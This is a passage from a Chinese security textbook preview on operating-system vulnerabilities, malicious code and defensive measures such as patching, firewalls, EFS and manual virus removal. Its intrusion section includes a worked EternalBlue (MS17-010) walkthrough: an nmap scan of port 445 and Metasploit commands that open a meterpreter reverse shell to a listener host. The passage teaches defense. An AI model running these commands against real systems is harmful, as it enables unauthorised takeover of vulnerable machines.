2000中的用户登录中文输入法漏洞,该漏洞允许非授权人员可以通过登录界面的输入法的帮助文件绕过Windows的用户名和密码验证,而取得计算机的最高权限。再如WinRAR的自解压功能,程序设计者的本意是为了方便用户的使用,使得没有安装WinRAR的用户也可以解压经过这种方式压缩的文件,但是这种功能被黑客用到了不正当的用途上,就造成了漏洞的产生。(2)除了程序逻辑结构设计漏洞之外,程序设计错误漏洞也是一个重要因素。受编程人员的能力、经验和当时的安全技术所限,在程序中难免会有不足之处,轻则影响程序效率,重则导致非授权用户的权限提升。这种类型的漏洞中最典型的是缓冲区溢出漏洞,它也是被黑客利用得最多的一种漏洞。缓冲区是内存中存放数据的地方,在程序试图将数据放到其内存中的某一个未知空间时,如果没有足够的空间就会发生缓冲区溢出。缓冲区溢出可以分为人为溢出和非人为溢出。人为溢出是有一定企图的,攻击者写一个超过缓冲区长度的字符串,并植入到缓冲区,这时可能会出现两种结果:一种结果是过长的字符串覆盖了相邻的存储单元,引起程序运行失败,严重的可导致系统崩溃;另一种结果就是利用这种漏洞可以执行任意指令,甚至可以取得系统root权限。(3)由于目前硬件无法解决的某些特定问题,使编程人员只得通过软件设计来表现硬件功能而产生的漏洞。2.2.2 恶意代码

除了系统漏洞,计算机病毒也是对操作系统构成威胁的一种常见方式。计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据,影响计算机使用,能自我复制的一组计算机指令或者程序代码。威胁计算机安全的指令或代码多种多样,计算机病毒只是其中具有代表性的一种,我们把这些故意编制或设置的、对网络或系统会产生威胁或潜在威胁的计算机代码统称为恶意代码。

随着互联网的发展,恶意的网络行为越来越多,病毒等恶意代码每年都呈几何级数增长。恶意代码是一种程序,它通过把代码在不被察觉的情况下镶嵌到一段程序中,达到运行具有入侵性或破坏性的程序,从而破坏被感染计算机数据的安全性和完整性的目的。按传播方式,恶意代码可以分成5类:病毒、木马、蠕虫、移动代码和复合型病毒。

1. 恶意代码的机制

虽然恶意代码的形式多种多样,行为表现各异,破坏性也不尽相同,但是它们的攻击机制大体还是一致的。整个作用过程大体分为6个步骤。(1)侵入系统

侵入系统是恶意代码实现其恶意行为的前提。恶意代码入侵的途径很多,例如,在来源不可靠的网站下载软件,接收已经感染恶意代码的电子邮件,存储介质之间的感染,黑客利用系统漏洞刻意植入恶意代码等。(2)维持或提升现有权限

恶意代码在入侵到系统后,不管是要自我复制进行传播还是直接进行破坏,都必须要具有相应的权限。所以无论是伪装成合法程序还是隐藏在合法程序内,恶意代码都需要维持已有的相应权限或者窃取合法程序的相应权限。(3)实施隐蔽策略

在入侵到系统之后,为了不让系统发现,恶意代码可能会通过重命名、删除原文件甚至修改系统的安全策略的方式来隐藏和保护自己。(4)潜伏

恶意代码侵入系统后,会等待一定的条件触发,当条件被满足,同时拥有权限的时候,恶意代码就会发作,进行破坏活动。(5)破坏

恶意代码具有破坏性,恶意代码的目的就是破坏系统的完整性,造成数据损坏,信息丢失等。(6)重复步骤(1)到(5),对新的目标实施攻击。

整个攻击模型如图2-7所示。图2-7 攻击模型

2. 恶意代码的危害

恶意代码不仅威胁着个人用户的财产安全,还可能造成更严重的影响。如果黑客入侵到公司或企业服务器上,从被攻击者的机器上窃取敏感数据和商业机密信息,轻者可能给被攻击者的声誉造成不良影响,重者可能会对公司的品牌及其业务造成严重或者重大的损害。恶意代码问题无论从政治上、经济上,还是军事上,都已成为信息安全面临的重要问题。恶意代码的危害具体体现在以下几个方面。(1)禁止使用计算机

一般情况下黑客们是不会进行这种攻击的。但是一旦被攻击,则后果不堪设想。在这种情况下,运行任何程序都会被禁止,一般只能重装操作系统了。(2)格式化硬盘

这类恶意代码主要是利用IE浏览器的Active X功能,让使用者在无意中格式化自己的硬盘。一般软件需要用户单独下载然后执行安装,而Active X插件是当用户浏览到特定的网页时,IE浏览器即可自动下载并提示用户安装,这是Active X插件的特点。Active X插件安装的一个前提条件是必须经过用户的同意及确认,所以我们在浏览网页时,如果对弹出的窗口提示不清楚,则千万不要随意回答“是”。(3)抢占系统资源

有的恶意代码不会去删除或格式化计算机的数据,但是它会通过检测出来的磁盘未使用空间,将恶意代码中的传染部分写进去,非法占据磁盘空间。还有一类恶意代码是常驻内存的,这类代码不但消耗了计算机内存资源,还常常通过修改内存中的一些进程,干扰系统运行。(4)修改浏览器设置

我们最常感染的一类恶意代码就是网页恶意代码。这类恶意代码往小了说,可通过修改主页和搜索引擎、加入弹框、植入广告和不良信息来非法获取利益,往大了说,会利用一些浏览器的漏洞在后台下载木马并执行,使计算机在不知不觉当中就感染了木马。(5)威胁数据安全

随着大数据时代的到来,数据的重要性日益突出。黑客已经不再是单纯地利用恶意代码来进行破坏性攻击了。实际上在WannaCry事件爆发之前,大量类似的蠕虫勒索病毒就已经开始肆虐。黑客利用恶意代码加密用户数据,然后对用户进行勒索,而且“赎金”需要以比特币的形式支付。这种虚拟货币支付形式分散、难以追踪,所以非常受黑客欢迎。2.2.3 入侵威胁

病毒杀伤力再大,它也只是一段既定的代码。而针对操作系统的入侵则是人为的攻击活动,方式策略更是灵活多变,早期黑客入侵只是为炫耀一下自己高超的技术或发泄一下情绪。但时至今日,这些入侵行为的动机和本质早已发生了改变。利益的驱使,法律的无知及黑客技术和工具的泛滥,使得许多黑客和不法分子大肆进行网络入侵,赚取不义之财。

例如,本章开篇提到的“永恒之蓝”事件,其实是利用了Windows操作系统一个底层服务的漏洞(漏洞编号MS17-010),再通过计算机开放的445端口入侵到目标计算机当中的。下面将通过案例来讲解攻击者是如何利用该漏洞进行入侵的。

1. 使用nmap扫描目标主机的操作系统类型以及是否开放了445端口

输入命令“nmap -O -p445 ip”,如图2-8所示,操作系统最有可能为Windows 7操作系统,且445端口是开启的。图2-8 显示445端口开启

2. 利用ms17_010_eternalblue模块进行渗透(1)在Kali中打开msf框架,输入命令“msfconsole”。(2)使用ms17_010_eternalblue模块及各个配置,大致过程如下。msf > use exploit/windows/smb/ms17_010_eternalbluemsf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(ms17_010_eternalblue) > set RHOST 10.10.12.188(目标主机IP)RHOST =>10.10.12.188msf exploit(ms17_010_eternalblue) > set LHOST 172.17.0.6(监听的主机IP)LHOST =>172.17.0.6msf exploit(ms17_010_eternalblue) > set LPORT 1234(监听的端口,设置为1234)LPORT =>1234msf exploit(ms17_010_eternalblue) > exploit

入侵结果如图2-9所示,可以看到已经成功获得了目标计算机的shell,完全控制了目标计算机。图2-9 成功入侵目标计算机2.3 操作系统的安全防范措施2.3.1 系统漏洞防范措施

一种操作系统从发布到用户使用,系统中的设计等缺陷会逐渐浮现出来,通常防范系统漏洞的措施有以下几种。

1. 及时更新Windows操作系统

软件开发者为了让计算机系统运行更稳定、更安全,必须及时地对操作系统的漏洞做出补救措施。Windows操作系统通过微软的Windows Update网页,可以在线下载、安装补丁,例如,微软在2017年3月更新了MS17-010补丁程序,如果用户及时更新了这个补丁,就不会被后来出现的WannaCry勒索软件勒索了。

更新Windows也可以通过启用系统的自动更新(Automatic Update)功能来实现,其步骤是,右键单击“我的电脑”,单击“属性”按钮,在“系统属性”对话框中选择“自动更新”选项卡,并选中“自动”单选项,设置为自动下载更新程序,设定好安装更新的时间(如每天12:00)后,系统会按时自动启动安装程序,更新系统,最后单击“确定”按钮,完成设置。

2. 利用系统自带的防火墙功能

Windows XP中自带一个基于包的防火墙。打开防火墙后,计算机将不响应“ping”命令,并禁止外部程序对本机进行端口扫描,另外还会自动记录所有发出或收到的数据包的IP地址、端口号、服务以及其他一些信息,可以有效地减少外部攻击的威胁。

启用Windows XP中自带的防火墙的具体步骤是,选择“开始”→“控制面板”菜单项,打开“控制面板”窗口,双击“Windows防火墙”图标,弹出“Windows防火墙”对话框,选中“启用(推荐)”单选项,然后单击“确定”按钮。

3. 利用加密文件系统

加密文件系统(Encrypting File System, EFS)是Windows 2000/XP所特有的一个实用功能,对于NTFS卷上的文件和数据,都可以直接被操作系统加密保存,在很大程度上提高了数据的安全性。

首先,EFS和操作系统紧密结合,因此用户不必为了加密数据安装额外的软件,这节约了用户的使用成本。其次,EFS对授权用户是透明的,也就是说,如果加密了一些数据,那么授权用户对这些数据的访问将是完全允许的,并不会受到任何限制,而其他非授权用户试图访问加密过的数据时,就会收到“访问拒绝”的提示。EFS的用户验证过程是在登录Windows时进行的,只要登录到Windows,就可以打开任何一个被授权的加密文件。

加密文件时,需要对其进行右键单击,选择“属性”按钮,在“常规”选项卡下单击“高级”按钮,然后在弹出的窗口中选中“加密内容以保护数据”,单击“确定”按钮,并等待片刻即完成。如果加密的是文件夹,系统还会询问是把这个加密属性应用到文件夹上还是文件夹以及内部的所有子文件夹,用户按照实际情况来操作即可。

4. 安装杀毒软件

杀毒软件除了具有查毒、杀毒、防毒等功能外,还有系统诊断、修复系统漏洞等功能,如奇虎公司的360安全卫士、瑞星公司的瑞星杀毒软件等。利用这些杀毒软件定期对系统进行扫描,并对扫描出的系统漏洞进行修复,也可以使系统更加稳定。

总之,在互联网信息发达的年代,每一台运行的计算机背后总有操作系统漏洞时时刻刻在威胁着计算机系统的安全运行。作为一名网络用户,在浏览网页、观看视频、图片及传送文件资料的同时一定要提前考虑操作系统的安全因素,可以通过安装杀毒软件、更新病毒库、扫描系统漏洞、及时安装补丁软件等手段,查漏补缺,防患于未然。2.3.2 恶意代码防范措施

面对形形色色的恶意代码,我们其实没必要谈虎色变,恶意代码通常就是利用系统漏洞和社会工程学来进行攻击的,只要我们做好应对,大部分的恶意代码还是可以进行防范的。

为了确保操作系统的安全,人们已经研究出了多种恶意代码的防范技术,在利用技术防范恶意代码的同时,还需要树立良好的防范意识,养成良好的操作习惯。对于这一点,通常有以下几点建议。(1)通过正规可靠的途径去下载、购买软件资源,不要安装任何来历不明的软件。(2)提高安全意识,不去单击任何陌生的链接,包括好友发来的链接,因为无法确定他的社交账号是否已经被盗。(3)查看任何邮件之前先查毒,不要因为是信任的人发来的邮件就疏于防范,因为在别人计算机上不发作的病毒,可能在自己的计算机上就会发作。(4)及时更新系统、防堵漏洞,不给恶意代码可乘之机。(5)开启杀毒软件监控,定期更新病毒库。

面对恶意代码,能够杜绝当然是最好的,但即使是杀毒软件也不是万能的,并不能检测和清除所有的病毒,尤其是那些新出来的并且能阻止执行文件运行的病毒,它不但能阻止一般的执行文件运行,还能阻止杀毒软件运行,甚至能卸载杀毒软件。面对如此凶猛的恶意代码,当然不能束手就擒,即便是感染了恶意代码,杀毒软件都被阻止了运行,还可以通过手动清除的方式把它彻底清除。下面来讲解如何手动清除杀毒软件无法清除的顽固病毒。

1. 确定病毒的进程

常见的系统进程有“csrss.exe”“lsass.exe”“explorer.exe”“services.exe”“svchost.exe”“winlogon.exe”等。右键单击任务栏,选择“任务栏管理器”,或同时按下“Ctrl + Alt + Delete”组合键就可以打开“Windows任务管理器”,如图2-10所示。图2-10 Windows任务管理器

从图2-10可以看到,系统在运行着很多进程,如何确定这些进程中哪个是病毒呢?尤其是有些病毒通常会伪装成系统进程。首先,我们检查一下有没有异常的进程,可通过进程后的“描述”来初步确定。另外,我们可以与平时对比,多了的进程往往就是有问题的,如“csrss.exe”和“svchost.exe”进程,正常情况下是在Windows\System32\目录下,如果出现在Windows目录下或其他目录下,一般就是病毒。

2. 清除病毒(1)结束进程

打开“Windows任务管理器”,在要结束的进程上单击右键,选择“结束进程”选项,如果不能结束可以选择强制结束。通过任务管理器可以查到进程的PID,然后通过命令窗口直接通过结束PID来杀

试读结束[说明:试读内容隐藏了图片]

下载完整电子书


相关推荐

最新文章


© 2020 txtepub下载